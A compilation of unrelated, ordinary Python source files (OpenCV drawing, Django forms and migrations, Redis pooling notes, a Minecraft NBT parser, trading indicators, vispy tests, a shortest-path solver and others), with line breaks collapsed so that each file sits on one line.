self._scan(cfg['target'], cfg['plugins']) emails = self.kb.get('emails', 'emails') self.assertEqual(len(emails), 2, emails)
python
import numpy as np import cv2 # 'uint8' assigns an 8bit unsigned integer to the colour values in the array pic = np.zeros((512, 512, 3), dtype = 'uint8') # Draw a rectangle from 0px to 512px # Magenta colour, not color colour = (255, 0, 255) # Circles overview: https://www.khanacademy.org/math/basic-geo/basic-geo-area-and-perimeter/area-circumference-circle/a/radius-diameter-circumference # Radius is "from the centre to any point on the circle itself" # Diameter is "from any point on the circle through the centre itself all the way to the other side (which is 2x the radius!)" # Circumference is "the distance of circle itself all the way around (diameter * 3.14159 or C/d = π)" # Draws an unaliased circle with a diameter of 128px cv2.circle(pic, (256, 256), 128, colour) # Learn more: https://docs.opencv.org/2.4/modules/core/doc/drawing_functions.html # Antialiasing should be straightforward: https://stackoverflow.com/questions/11055837/drawing-a-line-in-opencv-with-cv-aa-flags-is-not-producing-an-anti-aliased-line#25420463 cv2.imshow('Circle', pic) cv2.waitKey(0) cv2.destroyAllWindows()
python
#! /usr/bin/env python # _*_ coding:utf-8 _*_ class Solution(object): def generateParenthesis(self, n): if n <= 0: return [] if n == 1: return ['()'] res = self.generateParenthesis(n - 1) ret = set() for v in res: for i in range(len(v)): ret.add(v[0: i] + '()' + v[i:]) return list(ret) if __name__ == '__main__': so = Solution() # assert (so.generateParenthesis(0) == []) # assert (so.generateParenthesis(1) == ['()']) # print so.generateParenthesis(2) a = so.generateParenthesis(3) print 'n:3 sum:', len(a) a = so.generateParenthesis(4) print 'n:4 sum:', len(a) a = so.generateParenthesis(5) print 'n:5 sum:', len(a) a = so.generateParenthesis(6) print 'n:6 sum:', len(a)
python
from django_codemod.constants import DJANGO_1_9, DJANGO_3_1 from django_codemod.visitors.base import BaseRenameTransformer class PrettyNameTransformer(BaseRenameTransformer): """Replace `django.forms.forms.pretty_name` compatibility import.""" deprecated_in = DJANGO_1_9 removed_in = DJANGO_3_1 rename_from = "django.forms.forms.pretty_name" rename_to = "django.forms.utils.pretty_name" class BoundFieldTransformer(BaseRenameTransformer): """Replace `django.forms.forms.BoundField` compatibility import.""" deprecated_in = DJANGO_1_9 removed_in = DJANGO_3_1 rename_from = "django.forms.forms.BoundField" rename_to = "django.forms.boundfield.BoundField"
python
from yahoo import Quote, YahooQuote stocks = ['AA', 'AXP', 'BA', 'BAC', 'CAT', 'CSCO', 'CVX', 'DD', 'DIS', 'GE', 'HD', 'HPQ', 'IBM', 'INTC', 'JNJ'] stocks += ['JPM', 'KO', 'MCD', 'MMM', 'MRK', 'MSFT', 'PFE', 'PG', 'T', 'TRV', 'UNH', 'UTX', 'VZ', 'WMT', 'XOM'] price = {} quotes = {} returns = {} for s in stocks: print 'Stock', s for year in range(1993, 2015): try: quotes[year, s] = YahooQuote(s,'%s-01-01'%(str(year)), '%s-01-08'%(str(year))) except ValueError: pass for q in str(quotes[year, s]).split('\n'): if q.split(',')[0] == s: price[year, s] = float(q.split(',')[5]) break for s in stocks: for year in range(1994, 2015): returns[year, s] = (price[year, s]-price[year -1, s])/price[year -1, s] f = open('DJIA.dat', 'w') f.write('set assets := ') for s in stocks: f.write(s+' ') f.write(';\n') f.write('param R :') for s in stocks: f.write(s+' ') f.write(':=\n') for year in range(1994, 2015): f.write(str(year)+' ') for s in stocks: f.write('%.3f '%(returns[year, s])) f.write('\n') f.write(';\n') f.close() print 'param R :', for s in stocks: print s, print ':=' for year in range(1994, 2015): print year, for s in stocks: print '%.3f'%(returns[year, s]), print
python
"""Support for control of ElkM1 outputs (relays).""" from homeassistant.components.switch import SwitchEntity from . import ElkAttachedEntity, create_elk_entities from .const import DOMAIN async def async_setup_entry(hass, config_entry, async_add_entities): """Create the Elk-M1 switch platform.""" elk_data = hass.data[DOMAIN][config_entry.entry_id] entities = [] elk = elk_data["elk"] create_elk_entities(elk_data, elk.outputs, "output", ElkOutput, entities) async_add_entities(entities, True) class ElkOutput(ElkAttachedEntity, SwitchEntity): """Elk output as switch.""" @property def is_on(self) -> bool: """Get the current output status.""" return self._element.output_on async def async_turn_on(self, **kwargs): """Turn on the output.""" self._element.turn_on(0) async def async_turn_off(self, **kwargs): """Turn off the output.""" self._element.turn_off()
python
import pymongo import config from . import connection, db def create_indexes(): """ Create mongodb indexes. """ # VCF collection indexes db.vcfs.drop_indexes() db.vcfs.create_index("name") db.vcfs.create_index("samples") db.vcfs.create_index( [ ("filename", pymongo.ASCENDING), ("fileformat", pymongo.ASCENDING), ("filedate", pymongo.ASCENDING) ], sparse=True ) db.vcfs.create_index("INFO") db.vcfs.create_index("FORMAT") db.vcfs.create_index("FILTER") # Variant collection indexes db.variants.drop_indexes() db.variants.create_index("samples.sample") db.variants.create_index([("samples.sample", pymongo.ASCENDING),("samples.filter", pymongo.ASCENDING)], sparse=True) db.variants.create_index("samples.vcf_id") # Filter indexes db.variants.create_index([("chr",pymongo.ASCENDING),("samples.info.POS_RANGE",pymongo.ASCENDING),("orientation",pymongo.ASCENDING),("chr2",pymongo.ASCENDING),("remoteOrientation",pymongo.ASCENDING),("samples.sample",pymongo.ASCENDING)], sparse=True) def resetdb(): """ Drop database and recreate indexes. """ connection.drop_database(config.MONGODB_NAME) create_indexes()
python
# # Copyright (C) 2018 SecurityCentral Contributors see LICENSE for license # """ This base platform module exports platform related tasks. """ from securitycentralplatform.os_detection import platform_detection class SecurityCentralPlatformTasks(platform_detection("tasks")): pass tasks = SecurityCentralPlatformTasks()
python
from django import forms from apps.link.models import Link, Advertise from apps.post.models import Category, Post class CategoryAddForm(forms.ModelForm): class Meta: model = Category fields = "__all__" class CategoryEditForm(forms.ModelForm): pk = forms.CharField(max_length=100) class Meta: model = Category fields = "__all__" class PostAddForm(forms.ModelForm): class Meta: model = Post exclude = ('read_num',) class PostEditForm(forms.ModelForm): pk = forms.CharField(max_length=100) class Meta: model = Post exclude = ('read_num',) class LinkAddForm(forms.ModelForm): class Meta: model = Link fields = "__all__" class LinkEditForm(forms.ModelForm): pk = forms.CharField(max_length=100) class Meta: model = Link fields = "__all__" class AdvertiseAddForm(forms.ModelForm): class Meta: model = Advertise fields = "__all__" class AdvertiseEditForm(forms.ModelForm): pk = forms.CharField(max_length=100) class Meta: model = Advertise fields = "__all__" class UserAddForm(forms.Form): username = forms.CharField() email = forms.EmailField() password = forms.CharField(max_length=20, min_length=6) class UserEditForm(forms.Form): pk = forms.CharField() username = forms.CharField() email = forms.EmailField() password = forms.CharField(max_length=20, min_length=6)
python
# -*- coding: utf-8 -*- # Generated by Django 1.9.9 on 2016-08-18 23:25 from __future__ import unicode_literals from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('climate_data', '0006_auto_20160816_1429'), ] operations = [ migrations.AlterModelOptions( name='stationsensorlink', options={'ordering': ('station_order',)}, ), migrations.AddField( model_name='stationsensorlink', name='read_frequency', field=models.PositiveSmallIntegerField(default=4), ), ]
python
import doctest import unittest import zeit.cms.testing def test_suite(): suite = unittest.TestSuite() suite.addTest(doctest.DocFileSuite( 'content.txt', package='zeit.cms' )) suite.addTest(zeit.cms.testing.FunctionalDocFileSuite( 'cleanup.txt', 'cmscontent.txt', package='zeit.cms' )) return suite
python
# https://stackoverflow.com/questions/31663288/how-do-i-properly-use-connection-pools-in-redis # settings.py: import redis def get_redis_connection(): return redis.StrictRedis(host='localhost', port=6379, db=0) # task1.py import settings connection = settings.get_redis_connection() def do_something1(): return connection.hgetall(...) # task2.py import settings connection = settings.get_redis_connection() def do_something1(): return connection.hgetall(...) # So each task file has its own redis instance (which presumably is very expensive). # What's the best way of optimizing this process. Is it possible to use connection pools for this example? # You could choose to setup the connection pool in the init method and make the pool global # (you can look at other options if uncomfortable with global). redis_pool = None def init(): global redis_pool print("PID %d: initializing redis pool..." % os.getpid()) redis_pool = redis.ConnectionPool(host='10.0.0.1', port=6379, db=0) # You can then retrieve the connection from a pool like this: redis_conn = redis.Redis(connection_pool=redis_pool) redis-cli info Redis-py provides a connection pool for you from which you can retrieve a connection. Connection pools create a set of connections which you can use as needed (and when done - the connection is returned to the connection pool for further reuse). Trying to create connections on the fly without discarding them (i.e. not using a pool or not using the pool correctly) will leave you with way too many connections to redis (until you hit the connection limit). You could choose to setup the connection pool in the init method and make the pool global (you can look at other options if uncomfortable with global). redis_pool = None def init(): global redis_pool print("PID %d: initializing redis pool..." % os.getpid()) redis_pool = redis.ConnectionPool(host='10.0.0.1', port=6379, db=0) You can then retrieve the connection from a pool like this: redis_conn = redis.Redis(connection_pool=redis_pool) Also, I am assuming you are using hiredis along with redis-py as it should improve performance in certain cases. Have you also checked the number of connections open to the redis server with your existing setup as it most likely is quite high? You can use the INFO commmand to get that information: # redis-cli info # Check for the Clients section in which you will see the "connected_clients" field that will tell you how many connections # you have open to the redis server at that instant.
python
import base64 import gzip import io import json import re import struct from pathlib import Path from typing import Any, BinaryIO, Dict, List, Optional, Tuple, Union from backend import constants _here = Path(__file__).parent with open(_here/'exceptions/enchants.json') as f: ENCHANT_EXCEPTIONS = json.load(f) with open(_here/'exceptions/reforges.json') as f: REFORGE_EXCEPTIONS = json.load(f) def _pop_byte(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(1), byteorder='big', signed=True) def _pop_ushort(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(2), byteorder='big', signed=False) def _pop_short(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(2), byteorder='big', signed=True) def _pop_int(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(4), byteorder='big', signed=True) def _pop_long(bytes_f: BinaryIO) -> int: return int.from_bytes(bytes_f.read(8), byteorder='big', signed=True) def _pop_string(bytes_f: BinaryIO) -> str: payload = _pop_ushort(bytes_f) return bytes_f.read(payload).decode('utf-8') class NbtTag: """ Class defining an NbtTag: a value with an intrinsic name. """ name: str value: Any def __init__(self, name: str, value: Any): """ Construct an NbtTag instance. :param name: The name of the NbtTag. :param value: The value of the NbtTag. """ self.name = name self.value = value def __getitem__(self, key: Union[str, int]): """ Call __getitem__ on the NbtTag's value instance variable. :param key: The desired key. :return: The value of the key in the value instance variable. """ return self.value[key] def parse_byte(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_byte(bytes_f)) def parse_short(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_short(bytes_f)) def parse_int(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_int(bytes_f)) def parse_long(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_long(bytes_f)) def parse_float(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, struct.unpack('>f', bytes_f.read(4))) def parse_double(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, struct.unpack('>d', bytes_f.read(8))) def parse_byte_array(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' payload = _pop_int(bytes_f) arr = [_pop_byte(bytes_f) for _ in range(payload)] return NbtTag(name, arr) def parse_string(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' return NbtTag(name, _pop_string(bytes_f)) def parse_list(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' content_type = _pop_byte(bytes_f) payload = _pop_int(bytes_f) ret = [] for _ in range(payload): ret.append(PARSERS[content_type](bytes_f, read_name=False)) return NbtTag(name, ret) def parse_compound(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' tag_type = _pop_byte(bytes_f) ret = {} while tag_type != 0: tag = PARSERS[tag_type](bytes_f) ret[tag.name] = tag.value tag_type = _pop_byte(bytes_f) return NbtTag(name, ret) def parse_int_array(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' payload = _pop_int(bytes_f) arr = [_pop_int(bytes_f) for _ in range(payload)] return NbtTag(name, arr) def parse_long_array(bytes_f: BinaryIO, read_name: bool = True) -> NbtTag: name = _pop_string(bytes_f) if read_name else '' payload = _pop_int(bytes_f) arr = [_pop_long(bytes_f) for _ in range(payload)] return NbtTag(name, arr) PARSERS = [ None, parse_byte, parse_short, parse_int, parse_long, parse_float, parse_double, parse_byte_array, parse_string, parse_list, parse_compound, parse_int_array, parse_long_array ] def _without_nbt_style(s: str) -> str: """ Given a full string with NBT styling, return the string without coloring and recomb symbols. :param s: The given string. :return: The given string without NBT styling. """ return re.sub('§ka|§.', '', s).strip() def deserialize(b64: str) -> NbtTag: """ Decode the gzipped base-64 encoding of an item's metadata. :param b64: The gzipped base-64 item metadata. :return: A NbtTag with the decoded metadata. """ bytes_gz = base64.b64decode(b64) bytes_f = io.BytesIO(gzip.decompress(bytes_gz)) # Pop the outer compound tag indicator _pop_byte(bytes_f) return parse_compound(bytes_f) def _get_extra_attrs(nbt: NbtTag) -> Dict[str, Any]: """ Helper method to get the 'ExtraAttributes' tag compound from an item NbtTag. Useful for other extraction methods. :param nbt: The NbtTag to be read. :return: The 'ExtraAttributes' tag compound. """ return nbt['i'][0]['tag']['ExtraAttributes'] def _get_pet_attrs(nbt: NbtTag) -> Dict[str, Any]: """ Helper method to get the 'petInfo' tag and parse it into a dictionary. Returns an empty dictionary if no pet attributes are found. :param nbt: The NbtTag to be read. :return: Dictionary containing the pet attributes of the item. """ extra_attrs = _get_extra_attrs(nbt) as_str = extra_attrs.get('petInfo', '{}') return json.loads(as_str) def extract_api_id(nbt: NbtTag) -> str: """ Get the API ID of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The ID of the item, directly as it appears in the Skyblock API. """ extra_attrs = _get_extra_attrs(nbt) return extra_attrs['id'] def extract_generic_base_name(nbt: NbtTag) -> str: """ Given the NbtTag corresponding to an item, return its generic base name. This corresponds to removing special symbols and reforges from the raw display name. Often, dropping the first word is enough to remove the reforge, but some exceptions apply and are specified in REFORGE_EXCEPTIONS. :param nbt: The NbtTag to be read. :return: The name of the item with extra symbols removed and reforge dropped, if applicable. """ name = re.sub('[✪⚚✦◆™©�]', '', extract_generic_display_name(nbt)).strip() # No reforge, we are done if not extract_reforge(nbt): return name general_case = name.split(' ', 1)[-1] # If it's not an exception, just return the general case return REFORGE_EXCEPTIONS.get(name, general_case) def extract_generic_display_name(nbt: NbtTag) -> str: """ Extract the raw display name of an item (with NBT styling) from its NbtTag. :param nbt: The NbtTag to be read. :return: The api_name of the item, as a string. """ return _without_nbt_style(nbt['i'][0]['tag']['display']['Name']) def extract_identifiers(nbt: NbtTag) -> Tuple[str, str, str]: """ Extract the item ID, base name, and display name of an items from its NbtTag. :param nbt: The NbtTag to be read. :return: A tuple describing the item ID, base name, and display name of the item. """ api_id = extract_api_id(nbt) # Specialization for single-enchantment books if api_id == 'ENCHANTED_BOOK' and \ len(enchants := extract_enchants(nbt)) == 1: enchant, lvl = enchants[0] # Replace enchant if it matches an exception enchant = ENCHANT_EXCEPTIONS.get(enchant, enchant) item_id = f'{enchant.upper()}_{lvl}_BOOK' base_name = item_id.title().replace('_', ' ') display_name = base_name # Specialization for runes elif api_id == 'RUNE': rune, lvl = extract_rune(nbt) item_id = f'{rune}_RUNE_{lvl}' base_name = extract_generic_base_name(nbt).rsplit(' ', 1)[0] \ + f' {lvl}' display_name = extract_generic_display_name(nbt) # Specialization for pets elif api_id == 'PET': pet_type = extract_pet_type(nbt) item_id = f'{pet_type}_PET' base_name = item_id.title().replace('_', ' ') display_name = extract_generic_display_name(nbt) # Specialization for cake souls elif api_id == 'CAKE_SOUL': item_id = 'CAKE_SOUL' base_name = 'Cake Soul' display_name = extract_generic_display_name(nbt) # General case else: # Drop the fragment prefix item_id = api_id.removeprefix('STARRED_') base_name = extract_generic_base_name(nbt) display_name = extract_generic_display_name(nbt) return item_id, base_name, display_name def extract_stack_size(nbt: NbtTag) -> int: """ Get the number of items in an item stack from the associated NbtTag. :param nbt: The NbtTag to be read. :return: The number of items in the item stack. """ return nbt['i'][0]['Count'] def extract_rarity(nbt: NbtTag) -> str: """ Get the rarity of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The rarity of the item. """ try: lore = nbt['i'][0]['tag']['display']['Lore'] rarity_line = nbt['i'][0]['tag']['display']['Lore'][-1].value # Some runes have a weird footer in their lore if extract_api_id(nbt) == 'RUNE': for tag in lore: line = tag.value if _without_nbt_style(line).endswith('COSMETIC'): rarity_line = line words = _without_nbt_style(rarity_line).split() # Account for 'VERY_SPECIAL' case rarity = words[0] if words[0] != 'VERY' else 'VERY_SPECIAL' return rarity if rarity in constants.DISPLAY_RARITIES.keys() else 'UNKNOWN' except KeyError: # Some weird items don't have lore for some reason return 'UNKNOWN' def extract_rune(nbt: NbtTag) -> Optional[Tuple[str, int]]: """ Get rune information of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The rune of the item as a (rune name, level) pair, or None if no rune is associated with the item. """ extra_attrs = _get_extra_attrs(nbt) if 'runes' in extra_attrs: return list(extra_attrs['runes'].items())[0] return None def extract_enchants(nbt: NbtTag) -> List[Tuple[str, int]]: """ Get enchantment information of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: A list of (enchantment, level) pairs describing the enchantments on the item """ extra_attrs = _get_extra_attrs(nbt) enchantments = extra_attrs.get('enchantments', {}).items() return [(ench, lvl) for ench, lvl in enchantments] def extract_is_recombobulated(nbt: NbtTag) -> bool: """ Determine whether or not an item is recombobulated from its NbtTag. :param nbt: The NbtTag to be read. :return: Boolean, whether or not the item is recombobulated. """ extra_attrs = _get_extra_attrs(nbt) return 'rarity_upgrades' in extra_attrs def extract_is_fragged(nbt: NbtTag) -> bool: """ Determine whether or not an item has a Bonzo or Livid fragment applied to it from its NbtTag. :param nbt: The NbtTag to be read. :return: Boolean, whether or not the item is fragged. """ return extract_api_id(nbt).startswith('STARRED_') def extract_hot_potato_count(nbt: NbtTag) -> int: """ Determine the number of hot potato book upgrades on an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The number of hot potato book upgrades on the given item. """ extra_attrs = _get_extra_attrs(nbt) return extra_attrs.get('hot_potato_count', 0) def extract_reforge(nbt: NbtTag) -> Optional[str]: """ Get the reforge on an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The reforge of the item, or None if no reforge is present. """ extra_attrs = _get_extra_attrs(nbt) return extra_attrs.get('modifier') def extract_dungeon_stars(nbt: NbtTag) -> int: """ Get the number of dungeon stars on an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The number of dungeon stars on the item. """ extra_attrs = _get_extra_attrs(nbt) return extra_attrs.get('dungeon_item_level', 0) def extract_pet_type(nbt: NbtTag) -> Optional[str]: """ Get the pet type of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The pet type of the item, if applicable. """ pet_attrs = _get_pet_attrs(nbt) return pet_attrs.get('type') def extract_pet_exp(nbt: NbtTag) -> float: """ Get the pet experience of an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The pet experience on the item. """ pet_attrs = _get_pet_attrs(nbt) return pet_attrs.get('exp', 0) def extract_pet_candy_used(nbt: NbtTag) -> int: """ Get the number of pet candies used on an item from its NbtTag. :param nbt: The NbtTag to be read. :return: The number of pet candies on the item. """ pet_attrs = _get_pet_attrs(nbt) return pet_attrs.get('candyUsed', 0)
python
from timeit import timeit nTests=10000 print("Each operation performed {} times".format(nTests)) print("") print("Custom Quaternion") print("") importQuatVec = ''' from MAPLEAF.Motion import Quaternion from MAPLEAF.Motion import Vector v1 = Vector(1, 1, 2) ''' # Test Quaternion speed (init) print("Initializing Quaternion (Axis-Angle):") print(timeit("a = Quaternion(axisOfRotation=v1, angle=1.2)", setup=importQuatVec, number=nTests)) print("Initializing Quaternion (Components):") print(timeit("a = Quaternion(components=[1, 1.2, 2.3, 4.5])", setup=importQuatVec, number=nTests)) setupRotQuat = ''' from MAPLEAF.Motion import Quaternion from MAPLEAF.Motion import Vector qRot = Quaternion(axisOfRotation=Vector(1, 1, 2), angle=1.2) vec = Vector(1, 2, 3) ''' # Test Quaternion speed (rotate) print("Quaternion Rotating Vector:") print(timeit("a = qRot.rotate(vec)", setup=setupRotQuat, number=nTests)) print("") print("Scipy") print("") setupScipyRot = ''' from scipy.spatial.transform import Rotation as R from MAPLEAF.Motion import Vector v1 = list(Vector(1, 1, 2).normalize() * 1.2) ''' # Test Scipy speed (init) print("Initializing Scipy Rotation (Rotation Vector):") print(timeit("a = R.from_rotvec(v1)", setup=setupScipyRot, number=nTests)) setupScipyRot = ''' from scipy.spatial.transform import Rotation as R from MAPLEAF.Motion import Vector v1 = list(Vector(1, 1, 2).normalize() * 1.2) sRot = R.from_rotvec(v1) vec = [1, 2, 3] ''' # Test Scipy speed (rotation) print("Scipy Rotating Vector:") print(timeit("a = sRot.apply(vec)", setup=setupScipyRot, number=nTests)) print("") print("Custom Vector") print("") setup = ''' from MAPLEAF.Motion import Vector import numpy as np a = [1,2,3] v1 = Vector(1,2,3) v2 = Vector(2,3,4) nV1 = np.array([1,2,3]) nV2 = np.array([2,3,4]) ''' print("Initializing Vector (Components):") print(timeit("v1 = Vector(1, 1, 2)", setup=setup, number=nTests)) print("Initializing Vector (list):") print(timeit("v1 = Vector(*a)", setup=setup, number=nTests)) print("Initializing Vector (String):") print(timeit("v1 = Vector('(1 1 2)')", setup=setup, number=nTests)) print("Dot Product:") print(timeit("v3 = v1 * v2", setup=setup, number=nTests)) print("Cross Product:") print(timeit("v1.crossProduct(v2)", setup=setup, number=nTests)) print("") print("Numpy Vector") print("") print("Initializing Vector (Components):") print(timeit("v1 = np.array([1,2,3])", setup=setup, number=nTests)) print("Dot Product:") print(timeit("v3 = np.dot(nV1, nV2)", setup=setup, number=nTests)) print("Cross Product:") print(timeit("v3 = np.cross(nV1, nV2)", setup=setup, number=nTests))
python
# TI & TA from pyti.smoothed_moving_average import smoothed_moving_average as pyti_smmoothed_ma from pyti.simple_moving_average import simple_moving_average as pyti_sma from pyti.bollinger_bands import lower_bollinger_band as pyti_lbb from pyti.bollinger_bands import upper_bollinger_band as pyti_ubb from pyti.accumulation_distribution import accumulation_distribution as acd from pyti.aroon import aroon_up from pyti.aroon import aroon_down from pyti.rate_of_change import rate_of_change as roc from pyti.relative_strength_index import relative_strength_index as pyti_rsi from pyti.commodity_channel_index import commodity_channel_index from pyti.exponential_moving_average import exponential_moving_average as pyti_ema from pyjuque.Indicators.CustomIndicators.SuperTrend import ST from pyjuque.Indicators.CustomIndicators.OTT import ott, smoothrng from pyjuque.Indicators.CustomIndicators.HA import HA from traceback import print_exc def cci(df, period): return commodity_channel_index( df['close'].tolist(), df['high'].tolist(), df['low'].tolist(), period) def sma(df, source, period): return pyti_sma(df[source].tolist(), period) def ema(df, source, period): return pyti_ema(df[source].tolist(), period) def lbb(df, source, period): return pyti_lbb(df[source].tolist(), period) def ubb(df, source, period): return pyti_ubb(df[source].tolist(), period) def rsi(df, source, period): return pyti_rsi(df[source].tolist(), period) def isSupport(df,i): return df['low'][i] < df['low'][i-1] \ and df['low'][i] < df['low'][i+1] \ and df['low'][i+1] < df['low'][i+2] \ and df['low'][i-1] < df['low'][i-2] def isResistance(df,i): return df['high'][i] > df['high'][i-1] \ and df['high'][i] > df['high'][i+1] \ and df['high'][i+1] > df['high'][i+2] \ and df['high'][i-1] > df['high'][i-2] INDICATOR_DICT = { "sma": sma, "ema": ema, "lbb": lbb, "ubb": ubb, "cci": cci, "rsi": rsi, "smoothrng": smoothrng, "ott": ott } def AddIndicator(df, indicator_name:str, col_name, *args): # print("Args are", indicator_name, col_name) # print(args) try: if indicator_name == "ott": df[col_name[0]], df[col_name[1]] = ott(df, *args) else: df[col_name] = INDICATOR_DICT[indicator_name](df, *args) except Exception as e: print_exc() print("\nException raised when trying to compute the", indicator_name, "indicator:\n")
python
# -*- coding: utf-8 -*- # Copyright (c) Vispy Development Team. All Rights Reserved. # Distributed under the (new) BSD License. See LICENSE.txt for more info. """ Tests for LinearRegionVisual All images are of size (100,100) to keep a small file size """ import numpy as np from vispy.scene import visuals from vispy.testing import (requires_application, TestingCanvas, run_tests_if_main) from vispy.testing.image_tester import assert_image_approved from vispy.testing import assert_raises @requires_application() def test_linear_region_vertical_horizontal(): """Test vertical and horizontal LinearRegionVisual with a single color""" # Definition of the region pos = np.array([5, 15, 24, 36, 40, 42], dtype=np.float32) # Expected internal pos buffer for vertical region expected_pos_v = np.array([[5.0, -1.], [5.0, 1.], [15.0, -1.], [15.0, 1.], [24.0, -1.], [24.0, 1.], [36.0, -1.], [36.0, 1.], [40.0, -1.], [40.0, 1.], [42.0, -1.], [42.0, 1.]], dtype=np.float32) # Expected internal pos buffer for horizontal region expected_pos_h = np.array([expected_pos_v[:, 1] * -1, expected_pos_v[:, 0]], dtype=np.float32).T # Test both horizontal and vertical region for is_vertical, reference_image in [(True, 'linear_region1.png'), (False, 'linear_region1_h.png')]: expected_pos = expected_pos_v if is_vertical else expected_pos_h with TestingCanvas() as c: # Check set_data is working correctly within visual constructor region = visuals.LinearRegion(pos=pos, color=[0.0, 1.0, 0.0, 0.5], vertical=is_vertical, parent=c.scene) assert np.all(region._pos == expected_pos) assert np.all(region.pos == pos) assert region.is_vertical == is_vertical # Check set_data is working as expected when passing a list as # pos argument region.set_data(pos=list(pos)) assert np.all(region._pos == expected_pos) assert np.all(region.pos == pos) # Check set_data is working as expected when passing a tuple as # pos argument region.set_data(pos=tuple(pos)) assert np.all(region._pos == expected_pos) assert np.all(region.pos == pos) # Test with different dtypes that must be converted to float32 for t in [np.int64, np.float64, np.int32]: region.set_data(pos=pos.astype(t)) assert np.all(region._pos == expected_pos) assert np.all(region.pos == pos) assert_image_approved(c.render(), 'visuals/%s' % reference_image) # Check ValueError is raised when pos is not 1D assert_raises(ValueError, region.set_data, pos=[[1, 2], [3, 4]]) @requires_application() def test_linear_region_color(): """Test the color argument of LinearRegionVisual.set_data() method using a single color """ # Definition of the region pos1 = [5, 42] # Definition of the color of the region color1 = np.array([0.0, 1.0, 0.0, 0.5], dtype=np.float32) # Expected internal color buffer color1_expected = np.array([color1, color1, color1, color1], dtype=np.float32) with TestingCanvas() as c: # Check set_data is working correctly within visual constructor region = visuals.LinearRegion(pos=pos1, color=color1, parent=c.scene) assert np.all(region._color == color1_expected) assert np.all(region.color == color1) # Check set_data is working as expected when passing a list as # color argument region.set_data(color=list(color1)) assert np.all(region._color == color1_expected) assert np.all(region.color == color1) # Check set_data is working as expected when passing a tuple as # color argument region.set_data(color=tuple(color1)) assert np.all(region._color == color1_expected) assert np.all(region.color == color1) # Test with different dtypes that must be converted to float32 region.set_data(color=color1.astype(np.float64)) assert np.all(region._color == color1_expected) assert np.all(region.color == color1) assert_image_approved(c.render(), 'visuals/linear_region1.png') # Check a ValueError is raised when the length of color argument # is not 4. assert_raises(ValueError, region.set_data, color=[1.0, 0.5, 0.5]) # Check a ValueError is raised when too many colors are provided assert_raises(ValueError, region.set_data, color=[color1, color1, color1]) @requires_application() def test_linear_region_gradient(): """Test LinearRegionVisual with a gradient as color""" # Definition of the region pos2 = [5, 42, 80] # Definition of the color of the region color2 = np.array([[0.0, 1.0, 0.0, 0.5], [1.0, 0.0, 0.0, 0.75], [0.0, 0.0, 1.0, 1.0]], dtype=np.float32) # Expected internal color buffer color2_expected = np.array([color2[0], color2[0], color2[1], color2[1], color2[2], color2[2]], dtype=np.float32) with TestingCanvas() as c: # Check set_data is working correctly within visual constructor region = visuals.LinearRegion(pos=pos2, color=color2, parent=c.scene) assert np.all(region._color == color2_expected) assert np.all(region.color == color2) assert_image_approved(c.render(), 'visuals/linear_region2.png') run_tests_if_main()
python
import numpy as np from heapq import heappush, heappop from dataclasses import dataclass, field import os @dataclass(order=True) class PosItem: priority: int pos: tuple[int, int] = field(compare=False) path = os.path.join(os.path.dirname(__file__), "input.txt") def find_path(arr): pq = [] visited = set() cost = np.zeros_like(arr, dtype=np.int32) cost.fill(2 ** 31 - 1) prev = np.zeros(shape=(cost.shape[0], cost.shape[1], 2), dtype=np.int32) cost[0, 0] = 0 pq.append(PosItem(0, (0, 0))) while pq: item = heappop(pq) r, c = item.pos visited.add((r, c)) if ( (r + 1, c) not in visited and r < arr.shape[0] - 1 and cost[r, c] + arr[r + 1, c] < cost[r + 1, c] ): cost[r + 1, c] = cost[r, c] + arr[r + 1, c] prev[r + 1, c, :] = [r, c] heappush(pq, PosItem(cost[r + 1, c], (r + 1, c))) if ( (r, c + 1) not in visited and c < arr.shape[1] - 1 and cost[r, c] + arr[r, c + 1] < cost[r, c + 1] ): cost[r, c + 1] = cost[r, c] + arr[r, c + 1] prev[r, c + 1, :] = [r, c] heappush(pq, PosItem(cost[r, c + 1], (r, c + 1))) return prev, cost if __name__ == "__main__": with open(path) as file: contents = file.read() arr = np.asarray( [[int(n) for n in line] for line in contents.split("\n")], dtype=np.int32 ) prev, cost = find_path(arr) print(f"Lowest cost path is {cost[cost.shape[0]-1, cost.shape[1]-1]}")
python
